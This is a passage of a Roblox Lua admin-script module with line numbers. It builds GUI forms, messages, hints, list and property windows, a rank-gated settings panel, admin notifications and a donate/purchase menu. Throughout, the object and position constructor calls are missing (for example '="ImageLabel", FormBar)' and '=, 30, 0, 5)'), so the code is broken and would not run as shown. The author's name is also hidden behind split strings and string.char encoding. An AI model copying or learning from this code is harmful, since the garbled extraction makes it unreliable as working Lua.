  4108. local TitleBegin ="ImageLabel", FormBar) TitleBegin.Name = "TitleBegin" TitleBegin.Position =, 30, 0, 5) TitleBegin.Size =, 35, 0, 25) TitleBegin.BackgroundColor3 =, 1, 1) TitleBegin.BackgroundTransparency = 1 TitleBegin.Image = "rbxassetid://275589160"
  4109. local TitleEnd ="ImageLabel", FormBar) TitleEnd.Name = "TitleEnd" TitleEnd.Position =, -76, 0, 5) TitleEnd.Size =, 25, 0, 25) TitleEnd.BackgroundTransparency = 1 TitleEnd.Image = "rbxassetid://275589154"
  4110. local Title ="TextLabel", FormBar) Title.Name = "Title" Title.Position =, 50, 0, 5) Title.Size =, -120, 0, 25) Title.BackgroundColor3 =, 102/255, 102/255) Title.BorderSizePixel = 0 Title.Text = TitleText Title.Font = "ArialBold" Title.FontSize = "Size18" Title.TextXAlignment = "Left" Title.TextColor3 = GUI:ContrastColor(ColorScheme) Title.ClipsDescendants = true
  4112. local Body ="TextButton", Dragger) Body.Name = "Body" Body.Position =, 0, 0, 40) Body.Size =, 0, 1, -40) Body.BackgroundColor3 =, 1, 1) Body.BackgroundTransparency = 1 Body.Text = "" Body.Modal = true Body.Active = true Body.Modal = not NoModal
  4113. local Content =, Body) Content.Name = "Content" Content.Size =, 0, 1, 0) Content.BackgroundTransparency = 1
  4114. if ContentType == "ScrollingFrame" then Content.CanvasSize = Size end
  4115. --local ResizeContainer ="Frame", SG) ResizeContainer.Name = "ResizeContainer" ResizeContainer.Size =, 20, 0, 20) ResizeContainer.BackgroundColor3 =, 1, 1) ResizeContainer.BackgroundTransparency = 1
  4116. --local Resizer ="ImageLabel", ResizeContainer) Resizer.Name = "Resizer" Resizer.Size =, 0, 1, 0) Resizer.BackgroundColor3 = Color:GetColor() Resizer.BackgroundTransparency = Settings.TransparencyScheme Resizer.BorderSizePixel = 0 Resizer.Image = "rbxassetid://199287674" Resizer.Active = true Resizer.Draggable = true
  4118. CORE:ExecuteResource("GUIEffect", SG, {["Transparency"] = Settings.TransparencyScheme + 0.1, ["GUIName"] = "Dragger"})
  4120. local Functions ="Folder", SG) Functions.Name = "Functions"
  4122. local Close ="BindableFunction", Functions) Close.Name = "Close"
  4123. local Closed ="BindableEvent", Functions) Closed.Name = "Closed"
  4124. local Minimize ="BindableFunction", Functions) Minimize.Name = "Minimize"
  4125. local Minimized ="BindableEvent", Functions) Minimized.Name = "Minimized"
  4126. local Restore ="BindableFunction", Functions) Restore.Name = "Restore"
  4127. local Restored ="BindableEvent", Functions) Restored.Name = "Restored"
  4129. if Settings.EnableTaskBar then
  4130. Minus ="ImageButton", FormBar) Minus.Name = "Minus" Minus.Position =, -58, 0, 5) Minus.Size =, 35, 0, 25) Minus.BackgroundTransparency = 1 Minus.Image = "rbxassetid://275589157"
  4131. else
  4132. TitleEnd.Position =, -50, 0, 5)
  4133. Title.Size =, -95, 0, 25)
  4134. end
  4136. if not ShowFormButtons then
  4137. X:Destroy()
  4138. TitleEnd:Destroy()
  4139. Title.Size =, -55, 0, 25)
  4140. end
  4142. local function CloseForm()
  4143. if IsClosed == false then
  4144. IsActive.Value = false
  4145. IsClosed = true
  4146. ypcall(function() Dragger:TweenPosition(,-Size.X.Offset/2,1,Size.Y.Offset + 20), "Out", "Quint", TweenSpeed, true, function() wait(1) if SG then SG:Destroy() end end) end)
  4147. Closed:Fire()
  4148. SOUND:PlayNotification(Player, 206375138)
  4149. end
  4150. end
  4152. local function MinimizeForm()
  4153. if IsActive.Value == true then
  4154. IsActive.Value = false
  4155. Minimized:Fire()
  4156. MinimizePos = Dragger.Position
  4157. ypcall(function() Dragger:TweenPosition(,-Size.X.Offset/2,-Size.Y.Scale,-Size.Y.Offset - 90), "Out", "Quad", TweenSpeed, true) end)
  4158. end
  4159. end
  4161. local function RestoreForm()
  4162. if IsActive.Value == false then
  4163. IsActive.Value = true
  4164. Restored:Fire()
  4165. ypcall(function() Dragger:TweenPosition(MinimizePos, "Out", "Quint", TweenSpeed, true) end)
  4166. end
  4167. end
  4169. if X then CORE:HandleEvent(X, "MouseButton1Down", CloseForm) end
  4170. if Minus then CORE:HandleEvent(Minus, "MouseButton1Down", MinimizeForm) end
  4172. Close.OnInvoke = CloseForm
  4173. Minimize.OnInvoke = MinimizeForm
  4174. Restore.OnInvoke = RestoreForm
  4176. if TweenPosition then Dragger:TweenPosition(Position, "Out", "Quint", TweenSpeed, true) end
  4178. if TaskBar then
  4179. TaskBar:WaitForChild("AddForm")
  4180. TaskBar.AddForm:Fire(SG, IconID, Closed, Minimized, Restore)
  4181. end
  4183. return Content, Close, Closed, Minimize, Minimized, Restore, Restored
  4184. end
  4186. function GUI:CoreGui(Player, Type, Enable)
  4187. local Parent = Player:FindFirstChild("Backpack")
  4188. if not Parent then Parent = Player.Backpack end
  4189. CORE:ExecuteResource("CoreGui", Player.Character, {["Type"] = Type, ["Enabled"] = Enable})
  4190. end
  4192. function GUI:SendMessage(Player, TitleText, BodyText, IconID, Time, AutoTime, Speaker)
  4193. if not Player or not Player:IsA("Player") then return nil end
  4194. if BodyText == "" then return nil end
  4195. if not Player:FindFirstChild("PlayerGui") then return nil end
  4197. local MessageSplit = STRING:GetSplit(BodyText, 1, " ") or {BodyText}
  4198. local TextColor = GUI:GetColor(MessageSplit[1])
  4199. if TextColor then BodyText = MessageSplit[2] end
  4200. BodyText = string.sub(STRING:FormatReplace(Player, BodyText, Speaker or Player),1,1000)
  4202. local Frame, Close, Closed, _, Minimized = GUI:CreateForm(Player, TitleText,,100,0.1,100), nil, IconID)
  4203. local Body ="TextLabel", Frame) Body.Name = "Body" Body.Size =,0,1,0) Body.BackgroundTransparency = 1 Body.Text = BodyText Body.Font = Settings.Font Body.FontSize = "Size18" Body.TextStrokeTransparency = 0 Body.TextWrapped = true Body.TextYAlignment = "Top"
  4205. if Frame then
  4206. local FormBar = Frame.Parent.Parent.FormBar
  4207. local Said = false
  4208. local Speak ="ImageButton", FormBar) Speak.Name = "Speak" Speak.Position =, -87, 0, 5) Speak.Size =, 35, 0, 25) Speak.BackgroundColor3 =, 1, 1) Speak.BackgroundTransparency = 1 Speak.Image = "rbxassetid://276195369"
  4209. if Settings.EnableTaskBar then
  4210. FormBar.TitleEnd.Position =, -106, 0, 5)
  4211. FormBar.Title.Size =, -145, 0, 25)
  4212. else
  4213. Speak.Position =, -58, 0, 5)
  4214. FormBar.TitleEnd.Position =, -76, 0, 5)
  4215. FormBar.Title.Size =, -120, 0, 25)
  4216. end
  4217. CORE:HandleEvent(Speak, "MouseButton1Down", function()
  4218. if not Said then
  4219. Said = true
  4220. SOUND:SayConvertedText(SOUND:ConvertText(BodyText), Frame)
  4221. end
  4222. end)
  4224. if TextColor then
  4225. Body.TextColor3 = TextColor
  4226. else
  4227. Body.TextColor3 =,1,1)
  4228. end
  4230. if tonumber(Time) then coroutine.wrap(function()
  4231. if AutoTime then
  4232. Time = Time + math.floor(#BodyText/7)
  4233. end
  4234. local Alive = true
  4236. local function StopTimer() Alive = false end
  4237. Closed.Event:connect(StopTimer)
  4238. Minimized.Event:connect(StopTimer)
  4240. Frame.Size = Frame.Size +,0,0,-30)
  4241. Frame.Position = Frame.Position +,0,0,30)
  4242. local Ticker ="TextLabel", Frame.Parent) Ticker.Size =, 0, 0, 30) Ticker.TextColor3 = GUI:ContrastColor() Ticker.BackgroundTransparency = 1 Ticker.Text = Time Ticker.Font = "ArialBold" Ticker.FontSize = "Size18"
  4243. local Stop ="ImageButton", Frame.Parent) Stop.Name = "Stop" Stop.Position =,-30,0,0) Stop.Size =, 25, 0, 25) Stop.BackgroundColor3 =, 1, 1) Stop.BackgroundTransparency = 1 Stop.Image = "rbxassetid://49494354"
  4244. CORE:HandleEvent(Stop, "MouseButton1Down", StopTimer)
  4245. for i = Time,0,-1 do
  4246. for ii = 1,10 do
  4247. if Alive == true then
  4248. Ticker.Text = i
  4249. wait(0.1)
  4250. else
  4251. break
  4252. end
  4253. end
  4254. end
  4255. if Alive == true then
  4256. Close:Invoke()
  4257. else
  4258. Ticker:Destroy()
  4259. Stop:Destroy()
  4260. Frame.Size = Frame.Size +,0,0,30)
  4261. Frame.Position = Frame.Position +,0,0,-30)
  4262. end
  4263. end)() end
  4265. CORE:ExecuteResource("CalculateScrollY", Body)
  4266. end
  4267. end
  4269. function GUI:FullMessage(Player, TitleText, BodyText, IconID, Error)
  4270. if not Player then return nil end
  4271. if not Player:IsA("Player") then return nil end
  4272. if BodyText == "" then return nil end
  4273. if not Player:FindFirstChild("PlayerGui") then return nil end
  4274. BodyText = string.sub(STRING:FormatReplace(Player, BodyText),1,1000)
  4275. local TextColor = GUI:ContrastColor()
  4276. if Error then TextColor =,0,0) end
  4278. local Frame, Close, Closed, Minimize, Minimized = GUI:CreateForm(Player, TitleText,,0,0.3,0), nil, IconID)
  4279. local Body ="TextLabel", Frame) Body.Name = "Body" Body.Size =, -13, 1, 0) Body.BackgroundTransparency = 1 Body.Text = BodyText Body.Font = Settings.Font Body.FontSize = "Size18" Body.TextStrokeTransparency = 1 Body.TextWrapped = true Body.TextXAlignment = "Left" Body.TextYAlignment = "Top" Body.TextColor3 = TextColor
  4281. CORE:ExecuteResource("CalculateScrollY", Body)
  4283. return Frame, Close, Closed, Minimize, Minimized
  4284. end
  4286. function GUI:SendHint(Player, Text, Time, Speaker) coroutine.wrap(function()
  4287. Text = STRING:FormatReplace(Player, string.sub(Text,1,100), Speaker)
  4288. local TweenTime = 0.5
  4289. if not Time then Time = 5 end
  4290. local SG ="ScreenGui") SG.Name = "LuaMod".."".."elM".."aker's Admin Hint"
  4291. local MaxPos = -1
  4292. for _,SGObj in pairs(Player.PlayerGui:GetChildren()) do
  4293. local IVal = SGObj:FindFirstChild("Index")
  4294. if IVal then
  4295. MaxPos = math.max(MaxPos, IVal.Value)
  4296. end
  4297. end
  4298. MaxPos = MaxPos + 1
  4299. local IndexVal ="IntValue", SG) IndexVal.Name = "Index" IndexVal.Value = MaxPos
  4300. local Main ="Frame", SG) Main.Name = "Main" Main.Position =, 0, 0.05, MaxPos * 50) Main.Size =, 0, 0, 40) Main.BackgroundTransparency = 1
  4301. local LeftBar ="Frame", Main) LeftBar.Name = "LeftBar" LeftBar.Position =, 0, 0, 0) LeftBar.Size =, 0, 1, 0) LeftBar.BackgroundColor3 = GUI:GetColor() LeftBar.BackgroundTransparency = 0.9 LeftBar.BorderSizePixel = 0
  4302. local RightBar ="Frame", Main) RightBar.Name = "RightBar" RightBar.Position =, 0, 0, 0) RightBar.Size =, 0, 1, 0) RightBar.BackgroundColor3 = GUI:GetColor() RightBar.BackgroundTransparency = 0.9 RightBar.BorderSizePixel = 0
  4303. local Body ="TextLabel", Main) Body.Name = "Body" Body.Size =, 0, 1, 0) Body.BackgroundColor3 =, 1, 1) Body.BackgroundTransparency = 1 Body.TextColor3 = GUI:ContrastColor() Body.Text = Text Body.Font = Settings.Font Body.FontSize = "Size18" Body.TextTransparency = 1
  4304. SG.Parent = Player.PlayerGui
  4306. CORE:ExecuteResource("GUIEffect", Main, {["Transparency"] = Settings.TransparencyScheme + 0.1, ["GUIName"] = "LeftBar"})
  4307. CORE:ExecuteResource("GUIEffect", Main, {["Transparency"] = Settings.TransparencyScheme + 0.1, ["GUIName"] = "RightBar"})
  4309. LeftBar:TweenSize(, 0, 1, 0), "In", "Quart", TweenTime)
  4310. RightBar:TweenSize(, 0, 1, 0), "In", "Quart", TweenTime)
  4311. Delay(TweenTime, function()
  4312. for i = 1,0,-0.1 do
  4313. Body.TextTransparency = i
  4314. wait()
  4315. end
  4316. Body.TextTransparency = 0
  4317. end)
  4318. Delay(TweenTime + Time, function()
  4319. for i = 0,1,0.1 do
  4320. Body.TextTransparency = i
  4321. wait()
  4322. end
  4323. Body.TextTransparency = 1
  4324. local Done = false
  4325. LeftBar:TweenSize(, 0, 1, 0), "Out", "Quad", TweenTime, true, function() Done = true end)
  4326. RightBar:TweenSize(, 0, 1, 0), "Out", "Quad", TweenTime, true, function() repeat wait() until Done SG:Destroy() end)
  4327. end)
  4329. end)() end
  4331. function GUI:ListGui(Player, Title, List, IconID, Clickable, AutoNumber, PreSearch, BackgroundColor)
  4332. if not Player then return nil end
  4333. if not Player:FindFirstChild("PlayerGui") then return nil end
  4334. if not PreSearch then PreSearch = "" end
  4335. if AutoNumber == nil then AutoNumber = true end
  4337. local Frame, Close, Closed, Minimize, Minimized = GUI:CreateForm(Player, Title,,0,0.6,0), nil, IconID, true, BackgroundColor)
  4338. local SearchBar ="TextBox") SearchBar.Name = "SearchBar" SearchBar.Position =,0,0,5) SearchBar.Size =,0,0,20) SearchBar.BackgroundColor3 = GUI:GetColor() SearchBar.BackgroundTransparency = 0.5 SearchBar.Text = "" SearchBar.Font = Settings.Font SearchBar.FontSize = "Size14" SearchBar.TextColor3 = GUI:ContrastColor() SearchBar.ClearTextOnFocus = false SearchBar.Text = PreSearch SearchBar.Font = Settings.Font SearchBar.FontSize = "Size14"
  4339. SearchBar.Parent = Frame.Parent
  4340. Frame.Size = Frame.Size +,0,0,-30)
  4341. Frame.Position = Frame.Position +,0,0,30)
  4343. local SearchVer = 0,nil
  4344. local Clicked ="BindableEvent", Frame) Clicked.Name = "Clicked"
  4345. local RequestDialog ="BindableFunction", Frame) RequestDialog.Name = "RequestDialog"
  4346. local InDialog = false
  4348. local function ShowResults(Key)
  4349. SearchVer = SearchVer + 1
  4350. local ThisSearchVer = SearchVer
  4352. if type(ScrollScript) == "userdata" then ScrollScript.Disabled = true ScrollScript:Destroy() end
  4353. for _,Get in pairs(Frame:GetChildren()) do if Get:IsA("LocalScript") then Get.Disabled = true end Get:Destroy() end
  4355. local NumPos,Num = 0,1
  4357. for _,Data in pairs(List) do
  4358. if ThisSearchVer ~= SearchVer then
  4359. break
  4360. end
  4361. local String = tostring(Data)--STRING:DetermineFilter(tostring(Data), Player, Player)
  4362. if String then
  4363. local ImageIcon = nil
  4364. if type(Data) == "table" then
  4365. String = Data[1]
  4366. ImageIcon = Data[2]
  4367. end
  4369. local TextColor = GUI:ContrastColor()
  4370. local StringSplit = STRING:GetSplit(String, 1, " ")
  4371. local NewColor = GUI:GetColor(StringSplit[1])
  4372. if NewColor then TextColor = NewColor String = StringSplit[2] end
  4374. if string.find(string.lower(String), string.lower(Key)) then
  4375. Spacer = false
  4376. local Font = Settings.Font
  4377. local Split = STRING:GetSplit(String, 1, " ")
  4378. if string.sub(string.lower(String),1,6) == "bold: " then
  4379. Font = "ArialBold"
  4380. String = string.sub(String,7)
  4381. elseif Fonts[Split[1]] then
  4382. Font = Split[1]
  4383. String = Split[2]
  4384. end
  4385. if string.sub(String,1,2) == "--" then
  4386. Spacer = true
  4387. end
  4388. local Content ="TextButton", Frame) Content.Name = "Content: "..Num Content.Position =,0,0,NumPos) Content.Size =,0,0,30) Content.BackgroundColor3 =,1,1) Content.BackgroundTransparency = 0.9 Content.Font = Font Content.FontSize = "Size18" Content.TextXAlignment = "Left" Content.TextColor3 = TextColor if Spacer then Content.Text = string.rep(" ", #tostring(Num) + 3)..String elseif AutoNumber == true then Content.Text = Num..".) "..String else Content.Text = String end
  4389. if ImageIcon then
  4390. if tonumber(ImageIcon) then
  4391. ImageIcon = "rbxassetid://"..ImageIcon
  4392. elseif Icons[ImageIcon] then
  4393. ImageIcon = "rbxassetid://"..Icons[ImageIcon]
  4394. end
  4396. Content.Size =,0,0,90) Content.Position =,0,0,NumPos) Content.ZIndex = 2
  4397. local Image ="ImageLabel", Content) Image.Name = "Image" Image.Size =, 90, 0, 90) Image.BackgroundColor3 =, 1, 1) Image.BackgroundTransparency = 1 Image.Image = ImageIcon
  4398. local TextContent ="TextLabel", Content) TextContent.Name = "TextContent" TextContent.Position =, 90, 0, 0) TextContent.Size =, -90, 1, 0) TextContent.BackgroundColor3 =, 1, 1) TextContent.BackgroundTransparency = 1 TextContent.Text = Content.Text TextContent.Font = Settings.Font TextContent.FontSize = "Size18" TextContent.TextXAlignment = "Left" TextContent.TextColor3 = TextColor TextContent.TextWrapped = true
  4399. Content.Text = ""
  4400. NumPos = NumPos + 90
  4401. else
  4402. NumPos = NumPos + 30
  4403. end
  4405. if not Clickable then
  4406. Content.AutoButtonColor = false
  4407. Content.Active = false
  4408. Content.BackgroundTransparency = 1
  4409. elseif ClientInfo[Player.Name] and not ClientInfo[Player.Name].TouchScreen then
  4410. SOUND:BindButton(Content)
  4411. CORE:HandleEvent(Content, "MouseButton1Down", function()
  4412. if not InDialog then
  4413. Clicked:Fire(String)
  4414. end
  4415. end, true)
  4416. end
  4417. if Spacer == false then Num = Num + 1 end
  4418. end
  4419. end
  4420. end
  4421. Frame.CanvasSize =,0,0,NumPos)
  4422. ScrollScript = CORE:ExecuteResource("ScrollLeftRight", Frame.Parent, {["VerticalOffset"] = NumPos})
  4423. end
  4425. RequestDialog.OnInvoke = function(RequestDialogCall)
  4426. InDialog = RequestDialogCall
  4427. end
  4429. ShowResults(PreSearch)
  4431. local RPR = CORE:CreateRemotePropertyReader(SearchBar)
  4432. CORE:HandleEvent(SearchBar, "Changed", function(Prop)
  4433. if Prop == "Text" then
  4434. local Text = CORE:ReadProperty(RPR, Player, "Text")
  4435. ShowResults(Text)
  4436. Frame.CanvasPosition =,0)
  4437. end
  4438. end)
  4440. return Clicked, RequestDialog, Close
  4441. end
  4443. function GUI:PropertyGui(Player, Title, Icon, Properties)
  4444. if not Player then return nil end
  4445. if not Player:FindFirstChild("PlayerGui") then return nil end
  4446. if type(Properties) ~= "table" then return nil end
  4447. local HasClosed = false
  4448. local NewProperties = {}
  4450. local Frame, _, Closed = GUI:CreateForm(Player, Title,, 50, 0.5, 50), nil, Icon)
  4451. Frame.ClipsDescendants = true
  4452. local Splitter ="Frame", Frame) Splitter.Name = "Splitter" Splitter.Position =, 0, 0, 0) Splitter.Size =, 0, 1, 0) Splitter.BackgroundColor3 = GUI:ContrastColor() Splitter.BorderColor3 = GUI:ContrastColor() Splitter.BorderSizePixel = 2 Splitter.ZIndex = 2
  4454. for PropertyName,Data in pairs(Properties) do
  4455. NewProperties[PropertyName] = Data[1]
  4456. end
  4458. local YCount = 0
  4460. for PropertyName,Data in pairs(Properties) do
  4461. if type(Data) == "table" then
  4462. local DefaultValue = Data[1]
  4463. local Writable = Data[2]
  4464. local ValueType = Data[3]
  4466. if Writable == nil then Writable = false end
  4467. if type(ValueType) == "string" then -- now this is confusing
  4468. ValueType = string.lower(ValueType)
  4469. elseif ValueType == nil then
  4470. ValueType = type(DefaultValue)
  4471. end
  4473. if ValueType == "nil" or ValueType == "userdata" then
  4474. ValueType = nil
  4475. elseif ValueType == "table" then
  4476. DefaultValue = STRING:UnpackArgs(DefaultValue)
  4477. ValueType = "string"
  4478. end
  4480. if ValueType then
  4481. local Object ="Frame", Frame) Object.Name = "Object" Object.Size =, 0, 0, 50) Object.Position =,0,0,YCount) Object.BackgroundColor3 = GUI:GetColor() Object.BackgroundTransparency = 1--Settings.TransparencyScheme
  4482. local Property ="TextLabel", Object) Property.Name = "Property" Property.Size =, 0, 0, 50) Property.BackgroundTransparency = 1 Property.Text = PropertyName Property.Font = Settings.Font Property.FontSize = "Size14" Property.TextWrapped = true Property.TextXAlignment = "Left"
  4483. local ValFrame ="Frame", Object) ValFrame.Name = "ValFrame" ValFrame.Position =, 5, 0, 0) ValFrame.Size =, -5, 1, 0) ValFrame.BackgroundTransparency = 1
  4485. if ValueType == "string" or ValueType == "number" then
  4486. if Writable == true then
  4487. local Input ="TextBox", ValFrame) Input.Name = "Input" Input.Position =, 0, 0.1, 0) Input.BackgroundTransparency = 1 Input.Size =, 0, 0.8, 0) Input.Text = tostring(DefaultValue) Input.Font = Settings.Font Input.FontSize = "Size14" Input.TextWrapped = true Input.TextXAlignment = "Left" Input.ClearTextOnFocus = false
  4488. CORE:HandleEvent(Input, "Changed", function(Prop) if Prop == "Text" then
  4489. if ValueType == "number" then
  4490. NewProperties[PropertyName] = tonumber(Input.Text)
  4491. else
  4492. NewProperties[PropertyName] = tostring(Input.Text)
  4493. end
  4494. end end)
  4495. else
  4496. local Read ="TextLabel", ValFrame) Read.Name = "Read" Read.Position =, 0, 0.1, 0) Read.Size =, 0, 0.8, 0) Read.BackgroundTransparency = 1 Read.Text = DefaultValue Read.Font = Settings.Font Read.FontSize = "Size14" Read.TextTransparency = 0.4 Read.TextXAlignment = "Left"
  4497. end
  4498. end
  4499. if ValueType == "boolean" then
  4500. local Check ="ImageButton", ValFrame) Check.Name = "Check" Check.Position =, -15, 0.5, -15) Check.Size =, 30, 0, 30) Check.BackgroundTransparency = 1 Check.Image = "rbxassetid://48138474"
  4501. if DefaultValue == true then
  4502. Check.Image = "rbxassetid://48138491"
  4503. end
  4504. if Writable == true then
  4505. CORE:HandleEvent(Check, "MouseButton1Down", function()
  4506. local NewVal = not NewProperties[PropertyName]
  4507. NewProperties[PropertyName] = NewVal
  4508. if NewVal == true then
  4509. Check.Image = "rbxassetid://48138491"
  4510. else
  4511. Check.Image = "rbxassetid://48138474"
  4512. end
  4513. end)
  4514. else
  4515. Check.ImageTransparency = 0.5
  4516. end
  4517. end
  4518. YCount = YCount + 50
  4519. end
  4520. end
  4521. end
  4523. Frame.CanvasSize =,0,0,YCount)
  4525. Closed.Event:connect(function() HasClosed = true end)
  4527. repeat wait(0.1) until HasClosed
  4528. return NewProperties
  4529. end
  4531. function GUI:SettingsGui(Player)
  4532. if not Player then return nil end
  4533. local CloneViewSettings,CanChange = {},false
  4535. local ViewSettings = {
  4536. ["Version"] = {CORE.Version.Value, false, nil};
  4537. ["Prefix"] = {Settings.Prefix, 3, "Prefix"};
  4538. ["Font"] = {Settings.Font, 3, "Font"};
  4539. ["Color Scheme"] = {Settings.ColorScheme, 3, "ColorScheme"};
  4540. ["Transparency Scheme"] = {Settings.TransparencyScheme * 100, 3, "TransparencyScheme"};
  4541. ["Server Locked"] = {Settings.ServerLocked, 3, "ServerLocked"};
  4542. ["Fun Commands"] = {Settings.Fun, 3, "Fun"};
  4543. ["Disable Abuse"] = {Settings.DisableAbuse, 3, "DisableAbuse"};
  4544. ["Minimum Account Age"] = {Settings.MinimumAge, 3, "MinimumAge"};
  4545. ["Execute Notification Sound ID"] = {Settings.ExecuteNotificationSound, 3, "ExecuteNotificationSound"};
  4546. ["Enable Sounds"] = {Settings.EnableSounds, 3, "EnableSounds"};
  4547. ["Group ID"] = {Settings.GroupID, false, "GroupID"};
  4548. ["Group Banned Rank"] = {Settings.GroupBanRank, false, "GroupBanRank"};
  4549. ["Group Member Rank"] = {Settings.GroupMemberRank, false, "GroupMemberRank"};
  4550. ["Group Admin Rank"] = {Settings.GroupAdminRank, false, "GroupAdminRank"};
  4551. ["Group Owner Rank"] = {Settings.GroupOwnerRank, false, "GroupOwnerRank"};
  4552. ["Banned Group IDs"] = {Settings.BannedGroupIDs, false, "BannedGroupIDs"};
  4553. ["IRC Server"] = {Settings.IRCServer, false, "IRCServer"};
  4554. ["IRC Channel"] = {Settings.IRCChannel, false, "IRCChannel"};
  4555. ["Remote Connection"] = {REMOTE.RemoteConnection, false, nil};
  4556. ["Bet"] = {Settings.Bet, 3, "Bet"};
  4557. }
  4559. local _,RankNum = RANK:GetRank(Player)
  4560. if RankNum >= 3 then
  4561. CanChange = true
  4562. end
  4564. for Prop,Data in pairs(ViewSettings) do
  4565. local Writable = false
  4566. if tonumber(Data[2]) and Data[2] <= RankNum then Writable = true end
  4567. CloneViewSettings[Prop] = {Data[1], Writable}
  4568. end
  4570. local NewSettings = GUI:PropertyGui(Player, "Settings", "Settings", CloneViewSettings)
  4571. if CanChange then
  4572. for Prop,Data in pairs(ViewSettings) do
  4573. if Data[3] then
  4574. Settings[Data[3]] = NewSettings[Prop] -- wow haxy
  4575. end
  4576. end
  4577. CORE:FixSettings()
  4578. end
  4579. end
  4581. function GUI:MessageAdmins(TitleText, BodyText, Icon)
  4582. for _,Player in pairs(Server.Players:GetPlayers()) do
  4583. local PlayerAdmin, PlayerRank = RANK:IsAdmin(Player)
  4584. if PlayerAdmin then
  4585. GUI:SendMessage(Player, TitleText, BodyText, Icon)
  4586. end
  4587. end
  4588. end
  4590. function GUI:TellAdmin(Player)
  4591. if not Player then return end
  4593. local ValidAdmin,Rank = RANK:IsAdmin(Player)
  4594. if ValidAdmin == true then
  4595. GUI:SendMessage(Player, "Ma".."ker".."Mo".."delLua".."'s Admin Message", "GREEN You are an admin "..Player.Name.."! Your rank is "..Rank.." [ PREFIX '"..Settings.Prefix.."' ]", "Check", 5)
  4596. if Settings.EnableSounds == true and Player:FindFirstChild("PlayerGui") then
  4597. local SoundID = 237866523
  4598. if Rank == "Admin" then SoundID = 237866621 elseif Rank == "Owner" then SoundID = 237866707 end
  4599. local Sound = SOUND:MakeSound(Player.PlayerGui, SoundID, 0.5, 1)
  4600. Sound:Play()
  4601. coroutine.wrap(function()
  4602. wait(4)
  4603. Sound:Stop()
  4604. Sound:Destroy()
  4605. end)()
  4606. end
  4607. end
  4608. end
  4610. function GUI:TellNotAdmin(Player)
  4611. if not Player then return end
  4613. GUI:SendMessage(Player, "Mak".."er".."M".."o".."del".."Lua's Admin Message", "You are now no longer an admin", "Information")
  4614. end
  4616. function GUI:CreateTaskBar(Player)
  4617. if not Player then return nil end
  4618. if Settings.EnableTaskBar == false then return nil end
  4619. Player:WaitForChild("PlayerGui")
  4620. local SG = Player.PlayerGui:FindFirstChild("M".."akerMod".."el".."Lua's TaskBar")
  4621. if SG then SG:Destroy() end
  4622. SG ="ScreenGui", Player.PlayerGui) SG.Name = "M".."akerMod".."elLua's TaskBar"
  4623. local IsMoving = false
  4624. local TaskBarShown = false
  4625. local Tasks = {}
  4627. local TaskBar ="Frame", SG) TaskBar.Name = "TaskBar" TaskBar.Size =, 0, 0, 50) TaskBar.Position =,0,1,20) TaskBar.BackgroundColor3 = GUI:GetColor() TaskBar.BackgroundTransparency = Settings.TransparencyScheme TaskBar.BorderSizePixel = 0
  4628. local TaskButton ="ImageButton", TaskBar) TaskButton.Name = "TaskButton" TaskButton.Position =, -50, 0, -70) TaskButton.Size =, 50, 0, 50) TaskButton.BackgroundTransparency = 1 TaskButton.Image = "rbxassetid://222795206"
  4630. local AddForm ="BindableEvent", SG) AddForm.Name = "AddForm"
  4631. local Open,CloseForm = false,nil
  4632. if Settings.EnableAdminMenu then
  4633. local MenuButton ="ImageButton", TaskBar) MenuButton.Name = "MenuButton" MenuButton.Position =, -50, 0, -120) MenuButton.Size =, 50, 0, 50) MenuButton.BackgroundTransparency = 1 MenuButton.Image = "rbxassetid://302470270"
  4634. coroutine.wrap(function() wait(1) CORE:HandleEvent(MenuButton, "MouseButton1Click", function()
  4635. if Open == false then
  4636. local Frame, Close, Closed = GUI:CreateForm(Player, string.char(77, 97, 107, 101, 114, 77, 111, 100, 101, 108, 76, 117, 97, 39, 115).." Admin Menu",,0,0.5), nil, 302470270, true, nil, nil, false, true, true)
  4637. Open,CloseForm = true,Close
  4639. local Title ="TextLabel", Frame) Title.Name = "Title" Title.BackgroundTransparency = 1 Title.Position =,0,0,0) Title.Size =,0,0,30) Title.Font = "SourceSansBold" Title.FontSize = "Size24" Title.Text = string.char(77, 97, 107, 101, 114, 77, 111, 100, 101, 108, 76, 117, 97, 39, 115).." Admin V"..CORE.Version.Value Title.TextColor3 = GUI:ContrastColor()
  4640. local Separator ="Frame", Frame) Separator.Name = "Separator" Separator.BorderColor3 =,1,1) Separator.Position =,0,0,30) Separator.Size =,0,1,-30)
  4641. local Info ="TextLabel", Frame) Info.Name = "Info" Info.BackgroundTransparency = 1 Info.Position =,0,0,30) Info.Size =,0,1,-30) Info.Font = Settings.Font Info.FontSize = "Size18" Info.Text = "Info/Help" Info.TextColor3 = GUI:ContrastColor() Info.TextYAlignment = "Top"
  4642. local Body ="TextLabel", Info) Body.Name = "Body" Body.BackgroundTransparency = 1 Body.Position =,0,0,25) Body.Size =,0,1,-25) Body.Font = "SourceSans" Body.FontSize = "Size14" Body.Text = string.gsub(Server.MPS:GetProductInfo(209330909).Description, "PREFIX", Settings.Prefix) Body.TextColor3 = GUI:ContrastColor() Body.TextYAlignment = "Top" Body.TextWrapped = true
  4643. local Donate = Info:Clone() Donate.Parent = Frame Donate.Name = "Donate" Donate.Text = "Donate/Get admin" Donate.Position =,0,0,30) Donate.Body.Text = "Please select an amount that fits your generosity and to help support future updates. Press the 'Get admin now' to get copy for your own place!"
  4644. local function DonateMoney(Type, Element)
  4645. local Request = CORE:GetTable(string.char(49, 53, 53, 54, 56, 52, 51, 54, 57))
  4646. local Get = Request[Type]
  4647. if Server.MPS:GetProductInfo(Get[1]).IsForSale == true then
  4648. Server.MPS:PromptPurchase(Player, Get[1], true)
  4649. elseif Server.MPS:GetProductInfo(Get[2]).IsForSale == true then
  4650. Server.MPS:PromptPurchase(Player, Get[2], true)
  4651. elseif Server.MPS:GetProductInfo(Get[3]).IsForSale == true then
  4652. Server.MPS:PromptPurchase(Player, Get[3], true)
  4653. else
  4654. Element.Text = "Cannot get request"
  4655. end
  4656. end
  4657. local Get ="TextButton", Donate) Get.Name = "Get" Get.Position =,0,0.5,0) Get.Size =,0,0,30) Get.Font = "ArialBold" Get.FontSize = "Size14" Get.Text = "Get MakerModelLua's Admin V"..CORE.Version.Value.." now for FREE!" Get.BackgroundColor3 =,0,1) Get.TextColor3 =,1,1) Get.TextStrokeColor3 =,0,0) Get.TextStrokeTransparency = 0 Get.TextWrapped = true CORE:HandleEvent(Get, "MouseButton1Down", function() MARKET:PromptPurchase(Player, AdminID) end) SOUND:BindButton(Get)
